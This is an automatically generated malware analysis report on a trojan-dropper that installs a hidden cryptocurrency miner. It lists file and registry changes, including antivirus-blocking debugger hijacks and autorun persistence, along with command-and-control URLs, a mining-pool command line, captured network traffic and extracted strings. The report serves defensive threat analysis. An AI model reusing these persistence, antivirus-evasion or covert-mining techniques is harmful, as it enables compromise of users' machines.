Trojan.GenericKD.1604858_686d2b67d3

by malwarelabrobot on August 6th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Dapato.dxmy (Kaspersky), Trojan.GenericKD.1604858 (B) (Emsisoft), Trojan.GenericKD.1604858 (AdAware), Trojan.MSIL.Bladabindi.2.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 686d2b67d3fcf700aabd7b850461c433
SHA1: 2133dcd4fd2f78f173ee55eed79023d303499259
SHA256: 4dbfd7894859668baacd6cab60aa7bfeeee95e5618721ac18cf7ad0c1ecc69b2
SSDeep: 6144:H2 b8x d2VzAalK7d1GNU8fykJxDFkMcuDXOgfrf0i7RSn:T8Yd2d4riUyXdmMcSXOgT8C
Size: 247808 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-11 02:51:22
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912
WScript.exe:1736
%original file name%.exe:2024
%original file name%.exe:544
nt32.exe:1316

The Trojan injects its code into the following process(es):

cvtres.exe:432
nt32.exe:1560

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\NTKernel\nt32.exe (1281 bytes)

The process nt32.exe:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (49 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (54 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process WScript.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C EF 75 65 9B 5D 02 77 6F 77 36 2E 02 E1 5D 91"

The process cvtres.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 8A 01 A4 8F EA 19 E7 2B 87 62 1C 2F 30 1A 9E"

The process %original file name%.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 BE 49 BD CF 9F 00 3C 64 E9 39 00 FF 4E EB 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = " Offlin e Files Mig ration Plu gin."

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 14 30 C3 3D 2D 6E 74 00 E1 CB B6 4A 48 2B D8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process nt32.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C FD AD DB 77 45 E4 2C 33 83 8E 90 DE A6 F0 CE"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum+tcp://idhash.com:3333 -O ming.5:5 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"

"VMware User Process"

"Adobe ARM"

"SunJavaUpdateSched"

The process nt32.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 76 B6 DF 8B 60 D0 20 30 9C 40 8E 33 8D E0 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: Offlin e Files Mig ration Plu gin.
Comments:
Language: Hungarian (Hungary)

PE Sections

Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5
.text | 8192 | 244996 | 245248 | 5.36039 | f9d51a4540a1f3e42237042f4c09fa72
.rsrc | 253952 | 1536 | 1536 | 2.33762 | 81eadcd472e05fbf7d37f29b23ebb0a1
.reloc | 262144 | 12 | 512 | 0.056519 | 20cde55600486539501929554b1d8b93

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dota2id.org/panel/gate.php 108.160.152.134
hxxp://dota2id.org/panel/mining/CPUMiner.files 108.160.152.134
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.9.117.163
hxxp://crl.verisign.com/pca3.crl 23.9.117.163
hxxp://crl.verisign.com/pca3-g2.crl 23.9.117.163
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.9.117.163
idhash.com 128.199.193.246


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response

Traffic

GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "dee4c8c0f47e0b062f31548f63623031:1407186311"
Last-Modified: Mon, 04 Aug 2014 21:05:11 GMT
Date: Tue, 05 Aug 2014 02:49:38 GMT
Content-Length: 2249
Connection: keep-alive
Content-Type: application/pkix-crl

<<< skipped >>>

POST /panel/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: dota2id.org
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



crypt===gKtRWYqkDUYpieIdEM04iMgAEIgADNzcTRgACIgACIgACIgASVQNEIpIFKu9WZ
YBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
SYjdjZwUmZ3ATN1EGZidDNlljM3cjMmRGNxUjY5gjZxMzY5AjN5cDM


HTTP/1.1 200 OK

Date: Tue, 05 Aug 2014 02:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.4.25
Content-Length: 228
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html
=wnKTRUQFJFSUBCdtASN6UjLn5WatByTtAyMzMzM602bj5CazFGakl2LvoDcjR3KtVHdhJ
HdzBybtACdwlncjNHIh1iKgMXZslmZuIXZulWTVB1Qvcmbp5Wat9Cbl5WYw9yZy9mLklmM
hR3bk9yL6AHd0hGI0JXY0NnLyVmbp1Gfw9Gdz5icl5WatxHcvR3cuUHcn5icl5WatxXZsJ
WYuVmLyVGbsl2a09mY
....



GET /panel/mining/CPUMiner.files HTTP/1.1

Host: dota2id.org


HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:49:30 GMT
Server: Apache
Last-Modified: Fri, 21 Feb 2014 15:02:37 GMT
Accept-Ranges: bytes
Content-Length: 1511936
Content-Type: text/plain

<<< skipped >>>

GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "5722759b9289b36163a5ef7a94def647:1403746213"
Last-Modified: Thu, 26 Jun 2014 01:30:13 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Tue, 05 Aug 2014 02:49:38 GMT
Connection: keep-alive
Content-Type: application/pkix-crl

<<< skipped >>>

GET /pca3.crl HTTP/1.1

Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "6eb6550a090577f2ae45953ce2c8a47b:1403747414"
Last-Modified: Thu, 26 Jun 2014 01:50:14 GMT
Accept-Ranges: bytes
Content-Length: 933
Date: Tue, 05 Aug 2014 02:49:38 GMT
Connection: keep-alive
Content-Type: application/pkix-crl


GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "e3a9ed37247caa7391c0c49e246a368b:1407186311"
Last-Modified: Mon, 04 Aug 2014 21:05:11 GMT
Date: Tue, 05 Aug 2014 02:49:38 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

nt32.exe_1560:

.text
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
v2.0.50727
a.exe
System.Windows.Forms
stub_2.netrsrc.resources
System.IO
.ctor
System.Resources
System.Globalization
System.Reflection
System.CodeDom.Compiler
System.Diagnostics
.cctor
System.Runtime.InteropServices
System.Text
System.Text.RegularExpressions
System.Threading
stub_2.Properties
System.Configuration
System.Runtime.CompilerServices
3System.Resources.Tools.StronglyTypedResourceBuilder
2.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
9.0.0.0
1.0.0.0
$ac045e25-5d9e-42b8-a1ce-4c3a95960eae
_CorExeMain
mscoree.dll
stub_2.netrsrc

nt32.exe_1560_rwx_00400000_0002A000:

Same strings as nt32.exe_1560 above.

cvtres.exe_432:

.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
